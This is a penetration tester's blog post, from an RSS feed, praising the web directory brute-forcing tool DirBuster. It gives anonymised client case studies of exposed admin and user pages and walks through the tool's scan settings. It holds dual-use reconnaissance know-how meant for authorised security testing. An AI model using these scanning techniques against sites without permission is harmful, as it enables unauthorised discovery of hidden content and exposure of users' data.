<p>If you know what DirBuster is then you can skip this paragraph. If you don&#8217;t, then DirBuster is designed to brute-force directory and file names on web servers, the point being to find content to which there are no links. It&#8217;s an <a href="https://www.owasp.org/index.php/About_OWASP">OWASP</a> project and you can find it <a href="https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project">here</a>. While you can run it in a pure brute-force mode, you&#8217;ll most likely be using a dictionary to maximise your chances of finding something in the time available. DirBuster comes with a set of dictionaries that were generated by crawling the internet for real directory and file names.</p>
<h2>Cheer number 1</h2>
<p>On a test of a web portal DirBuster found pages at <code>/users/</code> and <code>/organisations/</code>. The portal was a closed system used by the owner to exchange financial information with many other organisations in (what was supposed to be) an isolated way. Sorry to be vague but you understand why! Navigating to <code>/users/</code> opened up a whole user management area, with full names, email addresses, roles, last login etc. At <code>/organisations/</code> there was an organisation management area, from where you could access the same user details from other organisations. Oops. While unauthorised data access was possible, attempts to execute administrative functions failed &#8211; but the fact that these functions were exposed was useful in itself because there was no CSRF protection. Moreover it was simple to target an administrator (of any organisation) because you could look them up from the user listings. The only saving grace was that you had to be authenticated &#8211; a point I&#8217;ll return to later.</p>
<h2>Cheer number 2</h2>
<p>On a public website for a high-street company, DirBuster found the page <code>/staff/</code>. This revealed a staff discount page where you could go through and order stuff at significant discounts, meaning lost revenue to the client. Of course, this sort of thing has a habit of getting out on to discount sites and the like. The page was available unauthenticated (although since anyone could register for an account, that&#8217;s by the bye).</p>
<p>Cheer number 2½: DirBuster also found a page that had a special offer for readers of a particular publication. Not as important this one since it was obviously there for the taking but it clearly wasn&#8217;t designed to be available to all.</p>
<h2>Cheer number 3</h2>
<p>On a test of a web portal, while authenticated, DirBuster found a positive response from <code>/admin</code>. This turned out to be an authorisation flaw and a short time later, after some fuzzing of user IDs, I had some 2,300 usernames and email addresses as well as plaintext passwords for about a third of those accounts. This portal was used by many different organisations &#8211; and a user from one of them could log in to another user&#8217;s account from another organisation. Oops.</p>
<p>In fact I had a fourth cheer yesterday, where I found a page that allowed me to self-register unauthenticated on (what was supposed to be) a <em>closed</em> site! But &#8220;four cheers for DirBuster&#8221; sounds a bit naff.</p>
<h2>Walk-through</h2>
<p>The rest (and majority) of this article is a walk-through of the main DirBuster configuration options. <em><span style="text-decoration: underline;">Note</span> that I&#8217;m describing a general case in what follows and obviously there may be times when you need to do things differently. That&#8217;s an important part of pentesting: adapting your test to suit the target</em>. Having said that, let&#8217;s take a look at the starting screen (of version 1.0 RC1, on which this article is based):</p>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-main-screen.png"><img class="aligncenter size-full wp-image-188" alt="DirBuster main screen" src="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-main-screen.png" width="769" height="589" /></a></p>
<h3>Target URL</h3>
<p>For the &#8220;Target URL&#8221; consider HTTP vs HTTPS. HTTP is obviously faster but a website will often redirect some or all requests to the HTTPS equivalent whether the page is actually there or not, which will spoil your results. You can enable &#8220;Follow Redirects&#8221; from the Options menu but that&#8217;s a considerable overhead if it&#8217;s happening with every request. If the redirect happens only when the page exists then an HTTP-based scan should be speedier. My personal preference is that if the site is happy serving the same pages over HTTPS, which is normal, I&#8217;ll go for HTTPS. Despite the overhead slowing down the request rate, it does tend to rule out excessive redirects since it would be unusual for an HTTPS request to be redirected to an HTTP equivalent. Redirects may also confuse the &#8220;fail case&#8221;, which DirBuster uses to decide whether or not a guess is correct, which could lead to false negatives as well as false positives. More on this later.</p>
<p>A similar situation may arise with the <em>domain</em> in that <span style="text-decoration: underline;">https://site.com/page</span> may always redirect to <span style="text-decoration: underline;">https://<strong>www</strong>.site.com/page</span> so use <span style="text-decoration: underline;">https://www.site.com:443</span> as your base URL.</p>
<h3>Work Method</h3>
<p>The default &#8220;Auto Switch&#8221; mode is probably best for the majority of cases. DirBuster will first try to see if it can get sensible results from HEAD requests, the reason being that the responses will be smaller. Even though it makes a GET request on 200 responses, this will save time when the 404 message (or equivalent) is relatively large. On the site I was looking at when writing this bit, the full HTML 404 response was about 19kB bigger than the disembodied 404 set of headers you&#8217;d get with HEAD. A crude bit of testing showed this took on average twice as long to arrive and be processed, adding 200ms to the response time. Given that you&#8217;re getting 404s most of the time this could mean a saving, even with the small dictionary, of over 1.4 gigabytes or 4 hours of waiting!</p>
<h3>Number Of Threads</h3>
<p>Running DirBuster with a high number of threads can slow down the target server, which may not go down too well if you&#8217;re testing a live site. You&#8217;ll probably find the default (10) to be a little over-enthusiastic, especially as you&#8217;ll be running other tests simultaneously. If you examine the number of threads in the DirBuster process (javaw.exe) while it&#8217;s running, you&#8217;ll see it jump up by more than the number you set in this field. I haven&#8217;t looked at the source code but I&#8217;m assuming that DirBuster is indeed honouring this field. I imagine that the &#8220;number of threads&#8221; refers to &#8220;Workers&#8221; that handle the actual requests and responses over the network while the other threads, for example, manage different queues depending on what you tick at the bottom of the screen.</p>
<p><span style="line-height: 1.714285714; font-size: 1rem;">As an aside, I&#8217;ve noticed that when you run a number of scans without re-starting DirBuster, the number of threads at rest tends to increase. I&#8217;m not sure if this is an issue that could degrade performance but just bear it in mind. </span><span style="line-height: 1.714285714; font-size: 1rem;">(I did try to contact the project lead, James Fisher, to ask about threading but I got no reply. And it&#8217;s not that big a deal to warrant rummaging through the source code!)</span></p>
<p>I have DirBuster running on another monitor so I can keep an eye on the requests per second and any sudden scrolling, which usually means errors! Bear in mind that, say, 20 requests per second over HTTP<strong>S</strong> will be working the server harder than 20 requests per second over HTTP. A nice feature is that once the scan is running, you can dynamically change the number of threads.</p>
<h3>Dictionary</h3>
<p>Assuming you opt for &#8220;List based brute force&#8221; you&#8217;ll now need to choose a dictionary &#8211; and for this you need to know whether or not your directories are case sensitive. Although you can often guess this from the server in use, e.g. IIS isn&#8217;t case sensitive, it&#8217;s always best to check. So test a page that you know to exist, i.e. does <code>/page</code> return the same as <code>/Page</code>? Even when the server is case-sensitive, a look over the site map in your web proxy may show that all the pages you&#8217;ve requested are in fact lower case. But don&#8217;t go thinking that using the case-sensitive lists will take all that much longer. Clicking &#8220;List Info&#8221; brings up some statistics on the dictionaries, a portion of which is shown below:</p>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-dict-list-info.png"><img class="aligncenter size-full wp-image-187" alt="DirBuster dict list info" src="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-dict-list-info.png" width="531" height="354" /></a></p>
<p>You can see that the case-sensitive lists are nowhere near even twice the size of the lowercase versions, which you might have imagined as a minimum. That&#8217;s because the lists are based on <em>real</em> names found by crawling the internet. The file &#8220;directory-list-2.3-small.txt&#8221; has 87,650 entries while the lowercase version has 81,629 entries so it&#8217;s only 6,021 entries longer (about 7% bigger). For the medium-sized lists the numbers are 220,546 vs 207,629 so the case-sensitive version is 12,917 entries longer (about 6% bigger). So using the case-sensitive lists may not involve as big a hit as you might expect. (You can also see from the List Info what the actual difference is between big, medium and small: the entries were found on at least 1, 2 and 3 hosts respectively.)</p>
<p>Before you even start your attack you could consider putting together a small dictionary of a few directories and files you&#8217;ve found, together with some gibberish entries, to use on a test run. If you don&#8217;t see the results you expect, review your configuration bearing in mind some of the points from this article. A short test run might save you hours of wasted effort.</p>
<h3>Starting options</h3>
<p>The &#8220;Standard start point&#8221; will assume directories end with / and files end with whatever you configure underneath. The &#8220;URL Fuzz&#8221; option allows you to insert the dictionary entries into the URL in a non-standard way. A good illustration is to discuss why there&#8217;s an Apache user enumeration list included in the set of dictionaries (apache-user-enum-2.0.txt). This is because if the <code>userdir</code> module is enabled (more on this <a href="http://httpd.apache.org/docs/2.4/mod/mod_userdir.html">here</a>) you can go hunting for usernames based on the fact that the user &#8220;bob&#8221; will have a folder mapped to <span style="text-decoration: underline;">http://site.com/~bob/</span>. So in this example the URL to fuzz would be <code>/~{dir}/</code> where <code>{dir}</code> is a placeholder for the words in the chosen dictionary.</p>
<p>The remaining options are self-explanatory but there are still a few things to consider. Obviously the more options you tick the longer the scan will take. So look first at the style of URL the website uses. For example, you might find that requests to <code>/page</code> produce redirects to <code>/page/</code> or that both of these return the same response. Either way, don&#8217;t run &#8220;Brute Force Dirs&#8221; together with &#8220;Brute Force Files&#8221;+&#8220;Use Blank Extension&#8221; because you&#8217;re doing twice the amount of work to get the same result. Conversely if you spot that there doesn&#8217;t seem to be much content in directories, i.e. none of the pages end with a / character, then don&#8217;t run &#8220;Brute Force Dirs&#8221;; rely on &#8220;Brute Force Files&#8221; instead.</p>
<p>If you enable the &#8220;Be Recursive&#8221; option, remember that DirBuster&#8217;s multi-threaded approach means that all those queues of work will be competing for a limited set of Workers. It&#8217;s easy to get into a situation where the Workers are looking in sub-folders of no real interest, slowing down the search for better candidates. In a time-limited test you could try looking at just the root content first by disabling this option. Where you go from there can be both manual and automated &#8211; and there&#8217;s always the option to create a custom dictionary for further scans based on the results of the first scan.</p>
<h3>Options Menu</h3>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-options.png"><img class="aligncenter size-full wp-image-189" alt="DirBuster options" src="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-options.png" width="309" height="246" /></a></p>
<p>I&#8217;ve already mentioned &#8220;Follow Redirects&#8221; &#8211; in general, tick this only if you have to because it has the capacity to slow down the scan. Without this ticked, you&#8217;ll see 301 and 302 responses in the final results and you can just manually target the ones of interest later.</p>
<p>Choosing &#8220;Debug Mode&#8221; will only make a difference if you&#8217;re launching DirBuster from a command window that remains open in the background:</p>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-debug.png"><img class="aligncenter size-full wp-image-186" alt="DirBuster debug" src="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-debug.png" width="736" height="264" /></a></p>
<p>The references to Worker[n] are to the threads doing the networking, so for the n threads that you set you&#8217;ll see Workers from [0] to [n-1].</p>
<p>The option &#8220;Parse HTML&#8221;, which is on by default, instructs DirBuster to read the HTML of files that it discovers, looking for files and folders it then doesn&#8217;t have to guess. These can be found, for example, in the <code>href</code> attributes of <code>&lt;a&gt;</code> tags. You might decide this is overkill since DirBuster will quickly begin to download a lot of stuff you&#8217;ll see elsewhere during testing e.g. in Burp&#8217;s Proxy and Site Map. Overall this may add an overhead for results you simply don&#8217;t need &#8211; at least not from this tool on the first scan. There&#8217;s another possible benefit to disabling this when running authenticated scans, which we&#8217;ll come to momentarily.</p>
<h3>Advanced Options</h3>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-advanced-options.png"><img class="aligncenter size-full wp-image-185" alt="DirBuster advanced options" src="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-advanced-options.png" width="620" height="626" /></a></p>
<p>I&#8217;ll skip the first two tabs, which are self-explanatory, and start with the tab that&#8217;s active in the screenshot above&#8230;</p>
<h4>Http Options</h4>
<p>First, DirBuster allows you to add custom headers to your requests so you could, for example, add an authenticated session management cookie. <em>Whoa! Did you say run an automated scanning tool authenticated?</em> Yes I did. After getting a feel of the site you may be comfortable doing this &#8211; it can pull out some interesting finds (as shown by the case studies at the start of this article). Anything you find authenticated that you didn&#8217;t find unauthenticated is really worth a look. Although the risk of side effects is much lower than running a full-on active web application scanner authenticated across a site, of course I have to say that it&#8217;s not without risk! I disable &#8220;Parse HTML&#8221; and &#8220;Be Recursive&#8221; as a safety measure.</p>
<p>Underneath is the &#8220;Http User Agent&#8221; and you can see the default looks nothing like a real User-Agent string. If you&#8217;re getting odd results from DirBuster that you&#8217;re not seeing in Burp, you could try changing that option, e.g. to &#8220;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0&#8221;.</p>
<p>Lastly, the option to use a proxy is useful for troubleshooting &#8211; as well as learning! You could also take advantage of your upstream proxy&#8217;s features to handle more complex cases (adding an overhead, of course).</p>
<h4><span style="line-height: 1.714285714; font-size: 1rem;">Scan Options</span></h4>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-Advanced-Options-Scan-Options.png"><img class="aligncenter size-full wp-image-190" alt="DirBuster Advanced Options - Scan Options" src="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-Advanced-Options-Scan-Options.png" width="549" height="163" /></a></p>
<p>Here lies the all-important &#8220;Fail Case String&#8221;, which by default is &#8220;thereIsNoWayThat-You-CanBeThere&#8221;. The response from this page is used to determine whether or not a guessed page/directory is there so it&#8217;s critical for the success of the scan. DirBuster will request this often in fact &#8211; for every file type in every directory that it finds. So starting from / with all the scan options enabled (directories, files, recursive and blank), having found <code>/admin/users/</code>, for example, DirBuster will request:</p>
<p><code>/admin/users/thereIsNoWayThat-You-CanBeThere/<br />
/admin/users/thereIsNoWayThat-You-CanBeThere<br />
/admin/users/thereIsNoWayThat-You-CanBeThere.php</code></p>
<p>If you&#8217;re getting strange results from DirBuster, consider changing this string. It may even be worth getting into the habit of manually testing the fail case string as a directory and page before you start a lengthy scan.</p>
<h4>DirBuster Options</h4>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-Advanced-Options-Options.png"><img class="aligncenter size-full wp-image-192" alt="DirBuster Advanced Options - Options" src="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-Advanced-Options-Options.png" width="593" height="219" /></a>The last tab serves as a reminder that most of the Options and Advanced Options discussed above get reset when you re-start DirBuster. Only the proxy settings persist beyond the options listed in this tab, which cover the default number of threads, dictionary and file extensions. These options will be pre-populated when you start DirBuster from fresh. Although you&#8217;ll lose many of your options on restart, being forced to reconsider them maybe isn&#8217;t such a bad thing.</p>
<h2>And finally</h2>
<p>It&#8217;s worth starting DirBuster relatively early on in the test because it can take a while to complete, and obviously you want some time left over to explore anything interesting it finds. Keep an eye on the results while it&#8217;s running to make sure you&#8217;re getting something sensible &#8211; and that you&#8217;re not causing a slew of 500 errors. Version 1.0 RC1 will pause automatically after 20 <em>consecutive</em> errors but those are <em>client-side</em> errors, not 500 responses. Equally if you&#8217;re getting mostly redirects, try to alter your parameters or, as a last resort, enable the &#8220;Follow Redirects&#8221; option.</p>
<p>Despite &#8211; or because of &#8211; your efforts to optimise your scan, you can often get a large number of hits. On the reporting side, the CSV option is useful because you get the Location, Response Code and Content Length on one line so you can quickly begin to process this and weed out the cruft.</p>
<p>Finally, note that you can invoke a command line interface by running DirBuster in headless mode. Check out the options with <code>java -jar &lt;DirBuster_jar_file&gt; -h</code>. The parameters don&#8217;t comprehensively match the GUI options, though, so if you need a command-line scanner of this type and DirBuster isn&#8217;t up to the job, try <code>dirb</code> (on Kali).</p>
]]></content:encoded>
			<wfw:commentRss>https://www.exploresecurity.com/three-cheers-for-dirbuster/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
	</channel>
</rss>
